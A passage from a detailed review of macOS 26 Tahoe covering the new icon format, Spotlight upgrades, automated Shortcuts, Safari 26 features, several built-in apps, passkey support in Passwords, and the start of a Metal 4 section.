But when is an icon not an icon?
Undergirding macOS's more flexible theming and color-shifting icons is an entirely different approach to icons.
In past macOS versions, the icon you saw in the Finder or on the Dock was the .icns file contained in the app package (usually in the Resources folder in any given app bundle). The OS didn't usually do anything to this icon; it was just displayed as it was, even though in the Big Sur era Apple
strongly encouraged
the usage of either rounded squares or lightly modified versions of rounded squares, in an "it would be nice if you all would start doing this" kind of way.
Tahoe is obviously getting more aggressive with icon-shape enforcement, up to and including automatically manipulating them and sentencing them to icon jail. Part of the point of this is to nudge developers toward using a single icon for every one of Apple's platforms that the app runs on—including iOS/iPadOS, macOS, and even watchOS. And to do
that
without requiring developers to manually create infinite color and tint combinations, we've got a new Apple Icon format (.icon) and
the Icon Composer app
.
Playing with the Ars logo in Apple's Icon Composer app for developers.
Credit:
Andrew Cunningham
Icon Composer is a layer-based image-editing app devoted entirely to the task of building icons for Apple's operating systems. It can import layers in .svg or transparent .png formats and offers basic controls for adjusting the opacity and shadows and arrangement of different layers (like macOS, the app applies the glassy effect to elements on its own). Developers can test icons in light, dark, or clear modes against any background color or gradient or background image that they want. If you do want your Mac and iOS apps to be a little different, there's a toggle in the app you can create to treat them separately, though it will still need to conform to the new rounded-square convention.
Icon Composer is meant as a last stop for an icon you've already designed in another app. Apple has created icon templates compatible with Adobe Photoshop and Illustrator, Figma, and Sketch. Those files contain 1024×1024 pixel rounded square shapes plus all of the gridlines that Apple encourages developers to use when designing and spacing different icon elements; Apple provides instructions for exporting layers from those apps individually as .svg or .png files.
You can love or hate Liquid Glass, and you can mourn or celebrate or be indifferent to this final death of Mac app icons with anything resembling their own unique shapes. But the idea behind Icon Composer and the new icon system is laudable, at least. Rather than manually generating icons in all kinds of different sizes for different platforms, you just create your icon once, double-check that it looks good in various modes against various backgrounds, and you send it to Xcode.
For backward compatibility, Xcode will generate a legacy .icns file based on your new .icon file; shipping different icons to fit the different looks of Tahoe and older macOS versions is
apparently not possible by design
.
Credit:
Andrew Cunningham
One downside to all of this icon trickery is that I can now semi-regularly open a Finder window and see a hint of a delay in between when the window pops up and when the icons all pop in. This effect is especially pronounced right after you change your icons' color scheme or tint—I'd guess that the icon images are cached somewhere once they're generated, and only generated again if you change them. I would assume that the effect will be worse on a slower disk, like an external hard drive or a networked file share.
Spotlight
Spotlight in macOS 26 Tahoe.
Credit:
Andrew Cunningham
This is completely anecdotal and unscientific, but when I hear some Mac power-user types talk about extra apps they
need
on a Mac to feel at home and productive, the apps that come up the most often are ones that replace or augment the built-in Spotlight search.
Spotlight, in its previous form, was focused mostly around searches, with a few extra capabilities (like basic arithmetic or unit conversions) thrown in for good measure. It could search for local files or apps, for some kinds of online information like movies and sports scores, for contacts, and a few other things—being able to search for and launch apps makes it a decent de facto app launcher for items that aren't on your Dock.
A broad overview of Spotlight's new capabilities.
Credit:
Andrew Cunningham
Some of the Spotlight improvements in Tahoe refine the search features that were already there, and some are new additions targeted toward the kinds of power users who might otherwise turn to apps like
Alfred
,
LaunchBar
, or
Raycast
for similar functionality. I don't know that Spotlight will replace those apps for their existing users, but as with the Passwords app, it might make Spotlight good enough to keep some people from hankering for a third-party solution in the first place.
Spotlight still mainly takes the form of a big search bar in the middle of your screen, invoked by clicking the magnifying glass on the top-right of the menu bar or with the Command + space keyboard shortcut. Apple seems to know that many people using Spotlight
are
using it exclusively with the keyboard, so everything here is meant to be doable with a handful of keyboard shortcuts and button presses.
Apple has added several generalized improvements to Spotlight in this release. These include the ability to search certain websites directly (type a URL and then tab to search that domain exclusively); to filter searches by typing a forward slash and then the name of an app, a file type, a folder, or a cloud storage provider; to search through currently open Safari tabs; and to page through your Spotlight search history by pressing the up and down arrows, the same way you look through your history in a command-line window.
But Spotlight's biggest change is the addition of four sub-categories that spring up to the right of the search bar after you let it sit without input for a couple of seconds: an Applications view, a Files view, an Actions view (with the same icon as the Shortcuts app), and a Clipboard view.
The Applications view is as close as Apple gets to offering the old Launchpad's functionality, listing five of your most frequently used apps at the top, an alphabetized list of your other apps below, and a few subcategory labels that mostly correspond to
Apple's App Store categories
. If you're paired to an iPhone via iPhone Mirroring, your iPhone apps also show up here, which can make for a big, messy alphabetized list of apps you'd never want to use on your Mac; conveniently, it's possible to hide iPhone apps from this view and just see the apps on your Mac. Apps in your Utilities folder are hidden away in their own section at the bottom of the list.
Aside from deciding whether you want to view iPhone apps and whether to view apps in a grid or list format, this view feels like it wants to be more customizable—a Windows Start menu-esque ability to manually pin or unpin apps from the top of the list would be nice.
The default Apps view in Spotlight, a replacement for the old Launchpad screen. If you've got iPhone Mirroring on, your phone apps all appear in this list too.
Andrew Cunningham
Use the arrow keys to highlight an app and press tab, and you'll be able to search within that app directly from Spotlight, useful for apps with searchable repositories of information, like Mail and Notes.
To an even greater extent than the Applications view, the Files view seems like it's meant to give Spotlight a tighter focus, rather than add all-new functionality. Finding files has been a core feature of Spotlight since it was originally added
two decades (!) ago
, but updates since then have buried them a little underneath a pile of website suggestions, App Store suggestions, and IMDB results, none of which are useful when you're just trying to find that dang spreadsheet you saved somewhere.
The Files view is visually similar to the Applications view (including the ability to use a list view instead of a grid), but the purpose of each section has changed. The text labels across the top of the window are commonly used apps that are associated with documents, images, and other file types, allowing you to restrict your search
only
to files openable by those apps.
The next section down includes "suggestions," generated at least in part by how recently you've opened a file. And after the suggestions is a scrollable "recents" view showing files on your Mac or your iCloud Drive or external media, sorted by how recently the files were created or modified. Third-party cloud storage providers that have shifted to using Apple's File Provider API, as
most
of them
have
, can display results here and in the general Spotlight search view.
Shortcuts and clipboard history
Shortcuts actions and custom Quick Keys shortcuts in Spotlight.
Credit:
Andrew Cunningham
The new Actions tab is where you start to get into the stuff that makes Spotlight more powerful, in addition to more focused. By default, what you'll see here is a long list of possible actions—recent ones that are more specific to you, like sending an email or text to a specific contact, as well as a long list of all the generalized shortcuts that first-party apps and compatible third-party apps can do.
All of these tasks map to actions that apps provide to the Shortcuts app using its App Intents framework—if the app you're using has created automations that can be used by Shortcuts, then those automations can be accessed here.
What makes these actions more Spotlight-y is the ability to take any specific action that you want to use and assign a Quick Keys shortcut to invoke it. For example, you could use "tmr" as a Quick Keys trigger for the "Start a Timer" action, and then type in "tmr 2" and hit enter to quickly set a two-minute timer right from Spotlight. That's a simple example, but the flexibility of Shortcuts should give you some idea of how versatile it could be once you spend some time setting it up.
Quick Keys triggers have a bunch of requirements:
Quick Keys can't use any special characters, like % or / or # or anything else like them
You can't use any spaces
You can't use capital letters (removing any possibility that Quick Keys might be case-sensitive)
Quick Keys triggers can be between one and 12 characters long.
Within those limitations, you can use any combination of letters and numbers that you like. That includes actual words, though personally I've tried to stay away from using words to avoid muddying up my general Spotlight search results. Setting multiple actions to the same Quick Keys combo is possible—it just brings up the entire list of actions with that Quick Key, rather than just triggering one specific action.
In my testing, it doesn't seem as though Quick Keys settings sync between Macs via iCloud, as text replacements and some other settings do. The downside is you'll need to set up Quick Keys on every Mac you want to use it on, if you're still splitting time between a work laptop and one at home, or a laptop and a desktop. But it does at least maximize flexibility for two Macs that are used for totally different things.
In addition to using the provided App Intents-derived actions, Quick Keys combinations can be assigned to any custom shortcut you've created in the Shortcuts app, making it possible to invoke fairly complex actions through Spotlight with just a few keypresses—converting all files in a given folder to another type, or clearing all items from your desktop that are older than a certain date. I assigned "nas" as a Quick Keys trigger for the shortcut I use to automate connecting to my home file server. (This sort of thing dovetails nicely with other improvements to Shortcuts in Tahoe, which we'll get to shortly.)
Clipboard history in Spotlight. It retains its history for eight hours and only supports basic re-copying, rather than editing or anything more advanced.
Credit:
Andrew Cunningham
The new clipboard history feature in Spotlight is probably the most broadly useful new feature, the closest you get to "low-hanging fruit" in an operating system that Apple has been continuously building on top of for 25 years.
It is turned off by default—anything that can store this kind of history is something that a snooper or domestic abuser could access. I noticed that passwords copied from Bitwarden, a third-party password manager, would show up in the clipboard history, though passwords copied from the first-party Passwords app wouldn't. It's best for privacy and security's sake, then, to make users explicitly choose to use it. But once you turn it on, it'll store your last eight hours of copy-and-pastes, whether they're text, images, or files. A user-configurable setting or a toggle for this deletion clock would be nice, but alas, it does not exist in this version.
The full list of recent copy-pastes is always accessible via the clipboard history section of Spotlight, but because they're part of Spotlight, they're searchable from within the main Spotlight bar and will show up alongside other results.
I do find myself wishing there was one keyboard shortcut, or a dock or menu bar icon, that opened the clipboard history directly. It's possible to devise a hack for this kind of thing, via scripting or Shortcuts, but there's a button assigned to opening the Apps view and an optional keyboard shortcut you can configure to open the same part of Spotlight. I've sort of gotten used to the motion of hitting Command + space to open Spotlight, and then hitting 4 while keeping my finger on the Command button. It just feels like the clipboard history is buried half an inch further down than I'd like it to be.
Spotlight's settings have evolved a little to match the feature's added complexity. The first toggle at the top controls whether you see those results in your Spotlight search from "Apple partners"—this is how it funnels in external info about movies and sports. One new button totally wipes out all your Quick Keys settings, if you want to start fresh, and another clears your Spotlight search history.
Newly redesigned settings for Spotlight.
Credit:
Andrew Cunningham
The menu of apps and system folders to exclude from searches is basically the same as it was before, but Apple is using sliders for those toggles instead of checkboxes now, and each app's icon appears next to it to make it easier to tell at a glance which is which. The last toggle, all the way at the bottom, turns the clipboard history all the way off, stopping it from storing history and removing the section from the Spotlight interface entirely.
I find basically everything about the Spotlight upgrade to be neutral to positive, for anyone other than hardcore Launchpad fans—Apple hasn't broken the way it used to work for people who don't touch it much, while adding some extra power-user flexibility that can be customized and extended near-infinitely by Shortcuts workflows. Keeping the clipboard history off until the user opts in is a nice touch.
Automated Shortcuts
Here, I've set my Mac to connect to my home NAS whenever it's plugged in, and to read out its current battery level.
Credit:
Andrew Cunningham
Of all the macOS features that have been added in the last five years or so, the one I use the
most
is probably the window snapping that they added to macOS 15 Sequoia, and the one I used second-most is Shortcuts, the modern and somewhat more user-friendly replacement for the old Automator app (Automator is still here, its interface just barely modernized enough to continue blending in). I don't have a ton of shortcuts set up, but the ones I do have I use several times a day.
Tahoe doesn't add much by way of new Shortcuts, but in addition to giving you another way to access them via Quick Keys in Spotlight, it adds Automations, a list of "if, then" statements that will run certain Shortcuts automatically when certain things happen (these are, again, not to be confused with Automator, a separate app that still exists).
Configuring a new automated Shortcut.
Credit:
Andrew Cunningham
Here are all of the things that can automatically run a Shortcut when they happen:
When it's a certain time of day, or sunrise, or sunset. These shortcuts can be set to repeat daily, weekly, or monthly.
When an alarm goes off, is snoozed, or is stopped.
When an email arrives. Users can specify a sender, a subject, or a recipient and can assign alerts to any one of the email accounts you've configured on the system.
When a text arrives in Messages, based on either sender or message content.
When items are added, modified, or removed in a given folder (this could be good for selective backups, when Time Machine is too heavy-duty.)
When a given file is modified.
When an external drive is connected or disconnected. This can be applied to one specific external drive, or
any
external drive.
When you connect to or disconnect from a specific Wi-Fi network, or when you're briefly disconnected from that network.
When you connect to or disconnect from a Bluetooth device.
When you connect to or disconnect from an external display. This one can't be tied to a specific external display—it fires when
any
external display is plugged in, which could make it a good candidate for the "run after confirmation" setting.
When the Stage Manager multitasking UI is turned on or off.
When a specific app is opened or closed.
When your battery level equals, rises above, or falls below a set percentage.
When you plug your Mac into a charger.
When you turn on or off the Do Not Disturb, Sleep, or Reduce Interruptions modes in the Do Not Disturb settings.
Automated Shortcuts can either be run automatically and invisibly or can prompt you for confirmation before running, making it usable for things you want to happen usually or sometimes but not always. Many automations offer an option to notify the user every time they run, even if they're set to run without confirmation.
You can tell automated Shortcuts to confirm with you first, which happens via notification.
Credit:
Andrew Cunningham
The shortcuts I use the most frequently are for converting images and slide decks into sizes and formats suitable for our CMS. Often, the images that companies send out with press releases have super-high resolutions so that they're usable anywhere on the web (as well as in print, though that use case is ever-dwindling). I often convert them to be 1920 or 2560 pixels wide, or convert them from PNG or .webp to a good-old .jpg.
Currently, I use Quick Actions to do those conversions by right-clicking the files I want to convert and then selecting which Shortcut I want to use. But with Automations, I could just as easily have every image I send to a given folder automatically convert itself into a format and size suitable for the site. I could have my laptop connect to my home NAS every time or have large video files offload themselves to an external disk every time I plug it in.
Shortcuts is already an app that only really gives you back as much effort as you put into it, and automated Shortcuts will be the same way. I often find setting up a new one to be an occasionally frustrating exercise in trial and error. But they offer yet another way to automate repetitive tasks you find yourself doing all the time, and I'm eager to see how I can work more of them into my own setup.
Apps: Safari 26
Tahoe includes a new major version of Safari, and like macOS, iOS, and Apple's other operating systems, it's switching to a year-based version numbering system. That means we're jumping from Safari 18 to Safari 26.
Per usual, Safari 26 will also be released to macOS 14 Sonoma and macOS 15 Sequoia, the other versions of macOS that Apple is still maintaining. On those platforms, it retains a user interface similar to Safari 18's, without the rounded Liquid Glass-ified touches you get in Tahoe.
There's plenty going on in Safari 26, as outlined in
the WebKit blog
and
Apple's WWDC session videos
. But once you filter out the incremental improvements to CSS and JavaScript that will mostly be of interest to web developers, changes that primarily affect platforms other than macOS (tweaks to how iOS and iPadOS handle webpages saved as apps, plus a bunch of stuff specific to visionOS), and password and passkey-related improvements that we'll cover in the section about the Passwords app, you don't end up with a huge list of features that Mac users will notice day to day.
Having dug through the changes, here's the list of Mac-related things that merited a half-interested "huh!" or better. When possible/applicable, we've done some surface-level checking to make sure all of this is supported in Sonoma and Sequoia, since Apple sometimes ships new Safari features that only work when the browser is installed on its newest OS.
WebGPU support
Safari 26 adds support for the WebGPU graphics API for the first time. Like the older WebGL standard—which WebGPU is meant to replace—WebGPU mainly allows for the rendering of 3D graphics within a browser window. WebGPU is a low-level graphics API that works with your platform's native low-level graphics language—DirectX 12 on Windows, Metal in macOS, and Vulkan in Linux—to give browsers more direct access to the GPU hardware. This can improve performance, but it also allows the WebGPU language to use your graphics hardware for things other than 3D, including machine learning-related or AI-related tasks that GPUs are better at than CPUs.
"Whereas WebGL is mostly for drawing images but can be repurposed (with great effort) to do other kinds of computations, WebGPU has first-class support for performing general computations on the GPU," explains
the W3C's draft report
outlining the WebGPU spec.
Apple is late to the party on implementing WebGL, but not egregiously so. Google first introduced support into Chrome (and Chromium, and products downstream of Chromium like Microsoft Edge)
back in 2023 with version 113
, but only in Windows, macOS, and Android; as of this writing, Linux support is still labeled "experimental" and is disabled by default. Firefox introduced it in
version 141
just this past summer, but only on Windows at first, with macOS and other platforms arriving "in the coming months." So if you don't like Chrome or Chromium for some reason, this will be your first chance to use WebGPU in the stable version of any browser.
WebGPU support in Safari 26 requires macOS 26 Tahoe. In our testing, it didn't work in Safari 26 running on macOS 14 Sonoma or macOS 15 Sequoia.
Credit:
Andrew Cunningham
As of Beta 5,
WebGPU samples that we tested
did
not
work in Safari 26 on macOS 14 Sonoma or macOS 15 Sequoia. To get support, you'll need to be running Safari 26 or newer on macOS 26 or newer. (WebGPU does work in Chrome and other Chromium browsers on these operating systems.)
HDR image support
Safari has supported HDR video for several years now, but Safari 26 adds support for
embedded HDR images,
for displays that can actually handle them.
Developers will be able to use
no-limit
and
standard
CSS tags to determine what happens when a mix of HDR and SDR content is being displayed at the same time. The
no-limit
tag will display HDR content in HDR; the
standard
tag will convert the images to SDR, which Apple says "prevents HDR images and video from appearing overly bright or out of place next to SDR content."
HDR image support also requires Safari 26 to be running on top of macOS 26. It won't be supported in Safari 26 on either macOS 14 Sonoma or macOS 15 Sequoia.
SVG favicons
Apple and Safari have gone on quite a journey when it comes to favicons, those little icons that websites put in your browser tabs.
For many years, Safari simply didn't support favicons in tabs
at all
, using only hard-to-distinguish text labels to differentiate tabs from one another. Starting with
2018's Safari 12 release
, Apple gave users the off-by-default option to use favicons in tabs, matching the way that every other browser in existence treated them. 2020's Safari 14
enabled favicons in tabs by default
. Having finally reconciled itself to the icons' utility, Apple is now working on improving them.
Those icons can actually be used in a lot of places throughout macOS (and iOS), including on Safari's new tab page, on the dock or Home screen (for web apps), and in Safari's tabs. Safari 26 adds the ability to recognize favicons in the .svg vector graphics format, which allows the images to be scaled up or down infinitely without losing quality, so they look nice and sharp no matter where they're displayed.
As Apple points out, the file size of an .svg file can often be smaller than a .png that's large enough to look good everywhere it's displayed. This saves web developers from needing to create multiple sizes of .png or .ico files and can even be used to create
an adaptive favicon
that can be tweaked to look different in dark and light modes.
Apple is more tardy with .svg favicon support than it is with WebGPU support—maybe not surprising, given how resistant the company was to using the icons as intended. Support has existed in Firefox and the Chromium family for many years (since 2019 or 2020 for Chromium, and as far back as 2015 for Firefox). Better late than never!
“Pretty text”
This one is technically a web developer feature, and if the pages you're viewing don't use it, you won't see any benefit. But the way Safari uses the CSS
text-wrap: pretty
property is kind of cool, and Apple is taking it a bit further than other browsers that support the property (including, yes, Chrome).
"Pretty text" is meant to automatically fix a few different things that can make text on the Internet worse-looking and/or more difficult to read. Without adjusting the kerning or anything about the actual typography, the "pretty" property scoots words around to avoid hyphenation, avoid short last lines at the ends of paragraphs, clean up ragged right edges of paragraphs, and help fix "typographic rivers" or distracting lines of vertical blank space that can be created when too many of the spaces between words line up across too many lines of text.
Examples of the things that the "pretty" CSS property is trying to clean up.
Credit:
WebKit blog
Chrome's implementation is
primarily focused on fixing short last lines
(also called "orphans," though the CSS Working Group recently
decided to stop using the terminology
). Apple developer evangelist Jen Simmons
writes
on the WebKit blog that the Chromium implementation of the tag just examines the last few lines of any given paragraph, while the WebKit/Safari implementation evaluates entire paragraphs at once when deciding how to lay out text.
The only thing the CSS specification says about the "pretty" tag is that browsers "should bias for better [text] layout over speed" when they encounter it but leaves the exact implementation up to individual browsers, which leaves room for Apple to go its own way a bit while still being standards-compliant.
Simmons and other developers have noted that the tag can come with a performance penalty but that the expected behavior is that "your text element would need to be many hundreds or thousands of lines long to see a performance hit."
The
text-wrap: pretty
property
appears to work
the same way in macOS 14 Sonoma and macOS 15 Sequoia as it does in Tahoe, once Safari 26 is installed.
Additional anonymizing
Apple says that Safari 26 takes steps to hide other personally identifiable information from "known fingerprinting scripts" that gather information about the device you're using to browse. Properties that Apple is trying to mask include "screen dimensions, hardware concurrency [that is, the number of logical processors available on your system], the list of voices available through the SpeechSynthesis API, Apple Pay payment capabilities, web audio readback, 2D canvas, and more."
Apple just says that the browser prevents these scripts from "reliably accessing web APIs" that may reveal this kind of information, suggesting that some loopholes may still exist.
The Phone app
The dialer in the new Phone app.
Credit:
Andrew Cunningham
While Apple has allowed macOS users to take incoming phone calls from their Macs for years now,
placing
a call from a Mac has been less straightforward. You could start a phone call by clicking a phone number in Contacts or some other app, and Messages gives you buttons to kick off a FaceTime call. You could use Siri to dial numbers. But macOS wouldn't offer you an actual phone dialer until you had already made a phone call (in Sequoia, it's accessible via a little 3x3 grid of circles in the little notification that pops up).
The Phone app in macOS is a version of the updated app that the iPhone is getting this year, rearranged a bit to account for the increase in screen space. The default view shows your favorite contacts and recent calls, plus buttons for editing your favorites and viewing only missed calls or calls with voicemails. A pane on the right shows different information based on what you've clicked—usually a contact card, for a recent or missed call, but also playback controls and a transcript for voicemails.
Things you can do in the Phone app in iOS, like adding a number to a contact or reporting a call as spam, can be handled here. It's possible in the Settings to enable, disable, and configure call screening and call filtering from unknown callers, settings that will sync to your phone as you change them.
Tahoe's tweaked version of the phone notification.
Credit:
Andrew Cunningham
Most importantly, hitting the 3x3 grid button next to the search bar brings up the standard iPhone dialer, one that can place calls directly to any number you like, rather than using Siri or your Contacts or Recents lists. Clicking each button individually with your pointer is an option, but the dialer also takes keyboard input (it still plays touch tones as you type numbers in) and will offer to paste things from the clipboard.
When you're on a call, devices with Apple Intelligence turned on can access the new Call Recording, Live Translation, and Hold Assist features, which are available from the ellipsis menu (you'll find more on those features elsewhere in the review), where you can bring up the contact card for whoever you're currently speaking to.
The Journal app
The Mac picks up a version of the Journal app this year, though it doesn't explain why the app wasn't on the Mac in the first place. The iOS version of the Journal app prompts you to write based on recent locations you've visited, and your Mac might not go on as many day trips or long walks with you. But you'd think it would make sense for Apple's keyboard-driven platform to get the minimalist app that does nothing other than record your written thoughts.
Regardless, it's here now! The main addition to the app this year (on all the platforms that now include it) is an option to create multiple different journals for different kinds of entries. You could have one for home and one for work, or separate journals just for vacations or other Major Life Events that you might want to have cordoned off in their own special area.
The other major addition is a "Places" view. If you let the Journal app record your location whenever you're writing an entry, you can open a map view and see pins for all the locations you've been. Clicking a pin brings up all the entries associated with that location.
As on the iPhone, Journal on the Mac lets you add photos to entries, and journals can be locked with TouchID to add an additional layer of authentication.
The Games app
The Games app in macOS 26 Tahoe.
Credit:
Andrew Cunningham
One could quibble about Apple's strategy, or about how successful the company has been in making the Mac a gaming destination. But Apple is visibly putting in the effort, adding new features and new tools in an attempt to make playing and developing games on the Mac a better experience. In the last few releases, Apple has added and continuously improved support for external game controllers, added a low-latency Game Mode, and introduced the Game Porting Toolkit, a collection of translation layers that helps developers test native Windows games on the Mac without modification.
We'll talk some more about the developer side when we talk about Metal 4, the upgraded version of Apple's graphics API, and improvements to Apple's Game Porting Toolkit. But for users, this year's big addition is a new Games app that serves as an alternate app storefront, a hub for online interactions and multiplayer, a reminder that the Apple Arcade service exists, and a library that gathers and displays all games installed on your Mac, including those you've installed from alternative game storefronts like Steam.
The Games app rises from the ashes of Game Center, an attempt during iOS' early days to give game developers a consistent Apple-controlled platform to use for leaderboards, achievements, and online multiplayer. Game Center was also a dedicated app, for a long while; the app was removed, but the underlying service was still there. Games is built directly on top of the remnants of the old Game Center, and any friends or achievements or multiplayer games you already had going through Game Center now appear in the Games app with no effort or action required.
New games can be bought directly through the Games app, or there's an "open in App Store" link next to the purchase buttons that will open the game's page in the App Store proper. Both apps are pulling ratings, descriptions, and other metadata from the same sources, and users can continue to buy games through the App Store without using the Games app at all. Purchased games show up both in the Library tab of the Games app, and in your list of past purchases in the App Store.
If you've spent any time with the Discover tab of the Mac App Store, the general layout of the Home tab in the Games app should look pretty familiar. It starts with a list of things you've recently bought or played, plus a feed of friend activity, some top charts for both Apple Arcade and various game categories, and then some curated highlights from Apple's internal App Store team.
When you're not a subscriber, the Arcade tab is just one big billboard for the Apple Arcade service, which costs $7 a month (or $20 a month as part of an Apple One subscription) for unrestricted access to a smallish but consistently updated batch of games. Subscribers can just use this tab to explore and download what's available.
The Friends tab is a repository of recent friend activity, and allows you to invite your friends into multiplayer games, or to participate in asynchronous "challenges" like trying to hit the highest score in a certain game within a certain amount of time. For people with longer and more active Game Center friend lists than I have, I can definitely see the appeal of this—something that allows for light competitive play that can be done whenever you can find the time, whether you're on a train, winding down before bed, or... well, what you're doing when you decide to play phone games is your business and not mine.
The Library tab sees App Store games plus locally installed games from other sources.
Credit:
Andrew Cunningham
The Library tab will be the most interesting for Apple Arcade subscribers who have a lot of games installed from Steam, GOG, or some other source. App Store-purchased games show up in your library whether they're installed or not, while games bought from elsewhere will only show up if they've been installed, but it's nice to be able to gather everything from the built-in Chess app to a Steam-installed copy of
Cyberpunk 2077
all in one interface.
There are different view filters for installed games, games with controller support, and games from Apple Arcade, though unfortunately for the Mac app there's no filter that shows only games made specifically for the Mac—you'll see some clutter in here from every iOS and iPadOS game you own that can technically be installed on a Mac, even if it's not optimized for the Mac.
Messages
The new Messages app design, complete with background.
Credit:
Andrew Cunningham
My favorite feature about this year's Messages upgrade is the ability to add backgrounds to conversations, even though (as with all the new OS-wide appearance settings) it's possible to use color gradients or photos that make your backgrounds look profoundly ugly. But the backgrounds are set for each individual contact or group text, so you have lots of leeway to experiment without simultaneously uglifying every one of your chats.
These do appear to sync between devices connected to the same iCloud account, but I noticed that they only really synced from my iPhone to my Macs rather than syncing from my Macs back to my iPhone. Like the names and icons used for group chats, they sync between everyone in a text thread, at least if all the devices involved are running iOS/iPadOS/macOS 26.
Those backgrounds are set up through a redesigned Details panel, which slides over from the right when you click the name of your group chat or the contact you're texting with. It replaces the pop-up style Details panel from older OS versions, and that you can leave the window and return to it without closing the details page does make it more pleasant to interact with.
An entirely separate Backgrounds tab gives you some preset color and image options, along with letting you generate a background in Image Playgrounds (for Apple Intelligence-enabled devices) or pull from your Photos library. The pre-programmed backgrounds, for better or worse, are all subtly animated when the window is active, which can make some text on them harder to read.
The new Details pane slides over from the right, rather than popping up.
Credit:
Andrew Cunningham
The backgrounds do go static when the Messages window is out of focus, but for a persistently static background, you'll want to use a photo from your library; I finally got Image Playgrounds to cooperate when I asked for a "solid purple background with no other objects;" just asking for a solid color usually encouraged it to try to improvise.
When you've enabled a background, your own bubbles stay blue, but the gray bubbles from the other people you're talking to become translucent panes of Liquid Glass. The only things I really ever had trouble reading consistently were the timestamps, names, and other status messages that just show up as unadorned text without any kind of drop shadow or backing material.
Rather than one endlessly scrolling Details page, it's now broken up into other tabs for photos, links, and documents, to make it a little easier to dig through all the different kinds of things that you've exchanged with the person or people you're talking to. It's also possible to add and edit contact cards directly from the main Info tab.
Choosing from among built-in backgrounds and color options.
Credit:
Andrew Cunningham
The Messages update in iOS 26 and macOS Tahoe adds spam protection and screening of messages from unknown senders, which has prompted
concern and veiled legal threats
from some political fundraisers (I do generally think it is a good sign when the people and organizations who abuse the status quo the most get upset about something Apple has added, as Meta did a few years ago when Apple
cracked down on some kinds of app tracking
). As much as we all love getting texts from candidates running for US House districts thousands of miles from where we live, from people claiming we have outstanding tolls due in states we've never been to, or from shady organizations
spreading political misinformation
, I think a lot of people are going to enjoy these features.
Other additions to the Messages app, at least for people safely ensconced in a group of blue-bubble friends, are live-updating polls, and typing indicators that tell you which person in a group chat is typing.
Notes
The Notes app can import and export Markdown files now.
Credit:
Andrew Cunningham
These days I tend to draft longer reviews and other feature work in
Typora
, a simple cross-platform
Markdown
text editor that supports exporting files to HTML that are easy to paste into our WordPress-based CMS. But I regularly jot down outlines, drafts of certain sections or paragraphs, and other bits and pieces in the Notes app, which is also my main repository for
podcast research notes
, to-do lists, and anything else I need to jot down quickly.
Apple has made my life somewhat easier this year by adding basic Markdown support to the Notes app—not the ability to write Notes in the Markdown language, but to import Markdown files into Notes and export Markdown files from Notes.
Markdown is a language with a lot of subvariants, and Apple notes that your Markdown files may look different in Notes than they do in the editor that made them. But for my Typora-made files that just use simple text formatting, ordered and unordered lists, and links, I had no problems getting files into and out of Notes with their formatting intact.
Terminal
The Terminal app gets new styles and sheds its actual 1970s terminal-based default size.
Credit:
Andrew Cunningham
The Terminal gets a subtle visual makeover in Tahoe, mainly via new "Clear Light" and "Clear Dark" theming options that add a touch of Liquid Glass translucency to the window.
The default typeface has been changed, from size 11 SF Mono Regular to size 12 SF Mono Terminal Regular—there's no real difference that I can see for regular letters and numbers, but Apple says the new Terminal supports Powerline glyphs, and I'd assume that's the main change between the two typefaces. Default windows open at a size of 120 columns and 30 rows, up from the previous 80 columns and 24 rows (those numbers were derived from the display resolutions of 1970s-era computer terminals, so the change is quietly momentous).
I did notice that the new theming and window sizing was only used by default on fresh installs of Tahoe; an upgrade install from macOS Sequoia still used the old default theme and 80×24 window size.
Finally, beyond the new Clear themes and all of the old ones that are still included, Apple says the new Terminal app has 24-bit color support, allowing users to choose from among 16.7 million colors when customizing the window.
The Passwords app and passkeys
It's not a perfect comparison, but I think
passkeys
now are a bit like USB-C was in the mid to late 2010s. It's a well-intentioned idea with a lot of potential and wide industry buy-in, and clearly better in important ways than the thing they're meant to replace. But the early rollout has been piecemeal and protracted and a bit messy, and it may still be a few years before they really come into their own.
This Apple developer video from this year's WWDC
is a wide-ranging look at all the things Apple is doing to help streamline passkeys and their implementation in Apple's Passwords app this year, mainly focused on using passkeys instead of passwords for new accounts, keeping passkeys up to date when they change, and seamlessly helping to migrate users to passkeys as apps and services add support for them.
Tahoe and Apple's other OS updates have added an account creation API that websites and apps can use to generate a passkey instead of a password when users sign up for a new account; this passkey can then be stored in Passwords, or any third-party app capable of storing passkeys, and synced between your devices to make sign-in easier everywhere.
Apps and websites are able to signal to Passwords and other password managers when a passkey needs to be updated, like when a user changes the email address on their account or some other information after they've already signed in. The same API is also able to revoke passkeys, preventing users from trying to sign in using a passkey that no longer functions.
And when using a password to sign in to an app or website that supports passkeys, those apps will automatically be able to generate a passkey for that account and add it to the user's password manager. This won't replace the user's password—they won't suddenly be locked out on other devices that don't support passkeys or aren't synced with Passwords or another credential manager—but it does build an off-ramp that people can use to throw out their passwords and switch to a passkey-only setup at some point later on.
The Passwords app is able to export and import passkeys and other information securely, in accordance with new FIDO Alliance standards.
Credit:
Andrew Cunningham
Because all of the tech industry's major players are trying to drive adoption of passkeys, Apple has made sure that these features work not just in the built-in Passwords app, but in third-party password managers and credential-storage apps that use the APIs that Apple provides for saving and autofilling credentials.
To that end, Apple has also implemented
new standards developed by the FIDO Alliance
for importing and exporting passkeys between different apps that support them. Exporting data from a password manager generally means spitting out a large plaintext .csv file and them importing that file into the new app you plan to use; the new Credential Exchange Protocol (CXP) and Credential Exchange Format (CXF) facilitates direct, secure communication between two different credential managers and standardizes the formats used to store and export passkeys, passwords, and other data.
As Apple's Passwords app becomes more useful and feature-rich, it will become more and more feasible for some users paying for a third-party password manager to switch to Apple's version instead. These new changes should help make that easier (and make the reverse easier, for people who decide to migrate from Apple's ecosystem to someplace else).
Tahoe, iOS, and iPadOS are all getting a new version of the Metal graphics and GPU compute API for the first time since 2022.
On the gaming side,
Metal 4
improves MetalFX upscaling, improves shader compilation speed, and adds the ability to generate interpolated frames, which can boost frame rates without requiring hardware upgrades.
For readers not well-versed in PC gaming, frame generation features look at two frames that your GPU has rendered and then uses machine-learning algorithms to generate a frame in between them. This is less computationally intensive than actually rendering all three of those frames; it can be combined with MetalFX's existing temporal upscaling, boosting performance even further.
Apple says that frame generation in Metal 4 uses the same depth and motion vectors that the MetalFX upscaler does, so games that have already adopted MetalFX should be able to add frame-generation support relatively easily.
But frame generation on PCs has real downsides, and we'd assume that frame generation on the Mac will have the same weaknesses. The first is that it introduces some extra input latency, because it's intentionally introducing a small delay to grab two frames so that it can create the interpolated frames between them.
